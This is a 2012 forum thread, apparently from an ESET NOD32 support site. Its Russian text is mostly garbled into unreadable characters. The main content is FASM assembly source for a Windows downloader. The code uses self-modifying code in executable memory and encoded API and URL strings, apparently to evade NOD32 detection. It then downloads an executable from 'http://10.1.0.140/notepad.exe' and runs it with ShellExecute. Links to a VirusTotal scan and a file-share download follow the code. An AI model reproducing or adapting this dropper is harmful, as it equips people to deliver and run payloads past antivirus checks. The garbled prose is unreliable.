�� NOD32

Fri, 10 Feb 2012 10:49:34 +0400

�� NOD32 � �� .
�� .
10.02.2012 10:49:34, ��.

�� NOD32

Fri, 10 Feb 2012 09:59:45 +0400

�� NOD32 � �� .
�� . �� "http://10.1.0.140/notepad.exe".
�� 100��, �� , �� , �� , �� , �� . �� 10 ��, �� ESET NOD32 �� .

====code====

format pe GUI 4.0
entry main
include 'win32ax.inc'
section ''code import writeable readable executable
library kernel32,'kernel32'
import kernel32,ExitProcess,'ExitProcess',\
VirtualAlloc,'VirtualAlloc',\
LoadLib,'LoadLibraryA',\
GetProcAdd, 'GetProcAddress',\
FreeLib, 'FreeLibrary'

main:
invoke VirtualAlloc,NULL,1024*1024*100,0x1000,0x40
cmp eax,0
je endprog
mov esi,eax
xor ecx,ecx
mov edx,ldcode
memcp:
mov bl, [edx]
mov [eax], bl
inc eax
inc edx
inc ecx
cmp ecx,1023
je endprog
;-eOfCd-
cmp byte [edx],'-'
jne memcp
cmp byte [edx+1],'e'
jne memcp
cmp byte [edx+2],'O'
jne memcp
cmp byte [edx+3],'f'
jne memcp
cmp byte [edx+4],'C'
jne memcp
cmp byte [edx+5],'d'
jne memcp
cmp byte [edx+6],'-'
jne memcp
jmp esi
endprog:
invoke ExitProcess,0

ldcode:
;[esi]
mov edi,esi
add edi,10
add esi,109
jmp esi
;[edi]
;_urlmon
db   'vsmnpo/emm',1;urlmon.dll
;[edi+11]
;_shell
db   'tifmm43/emm',1;shell32.dll
;[edi+23]
;_URLDownloadToFile
db   'VSMEpxompbeUpGjmfB',1;URLDownloadToFileA
;[edi+42]
;_ShellExecute
db   'TifmmFyfdvufB',1;ShellExecuteA
;[edi+56]
;_file
db    '`uftu`/fyf',1
;'_test_.exe',0
;[edi+67]
;_url
db    'iuuq;0021/2/1/2510opufqbe/fyf',1,2
;'http://10.1.0.140/notepad.exe',0,1
db 3Ch
;[edi+99]
;[esi]
mov ecx,146420
;[esi+5]
mov ebx,edx
xor eax,eax
dec ecx
lahf
and eax,100000000000000b
shr eax,14
mov edx,esi
add edx,5
imul eax,1Bh
add edx,eax
jmp edx

db 1Ah

;[esi+1Bh]
xor eax, eax
;[esi+1Dh]
mov ecx, edi
;[esi+1Fh]
mov ebx, edi
;[esi+21h]
add esi,29h
;[esi]
cmp byte [ebx], 2
lahf
and eax,100000000000000b
shr eax,14
mov edx,esi
;add edx,1Ch
imul eax,1Ah
add edx,eax
dec byte [ebx]
inc ebx
push edi
jmp edx
db 0FFh
;[esi+1Ah]
call [LoadLib]
;get procAdd from urldownloadtofile.
mov edx,edi
add edx,23
push edx
;        push _URLDownloadToFile
push eax
call [GetProcAdd]

;downloades our target file and save it to _file
   push eax
   push 0
   push 0
;        push _file
   mov edx,edi
   add edx,56
   push edx
;       push _url
   mov edx,edi
   add edx,67
   push edx
   push 0
   call eax
   pop eax
   invoke FreeLib, eax

;loads shell32.dll
;       push _shell
   mov edx,edi
   add edx,11
   invoke LoadLib, edx

;get procAdd from shellexec
;        push _ShellExecute
   mov edx,edi
   add edx,42
   push edx
   push eax
   call [GetProcAdd]

   
;runs _file using shellexec
   push eax
   push SW_SHOW
   push 0
   push 0
   mov edx,edi
   add edx,56
   push edx
   ;push _file
   push 0
   push 0
   call eax
   pop eax
   invoke FreeLib, eax

   invoke ExitProcess, 0

endsig db '-eOfCd-'

=============

�� :
https://www.virustotal.com/file/acf03eea070f30f09e62305465f14d04a44318fb9f5259bc2cb5838e027af0e1/analysis/1328850462/

�� :
http://rghost.ru/36438523

�� http://esetnod32.ru/.support/knowledge_base/new_virus/index.php (�� ).
dl-test-enc-dynld-jmp.ASM.txt
10.02.2012 09:59:45, av-fasm.

����� esetnod32.ru [����: ���������� ������� NOD32]

���������� ������� NOD32

���������� ������� NOD32

�� esetnod32.ru [��: �� NOD32]

�� NOD32

�� NOD32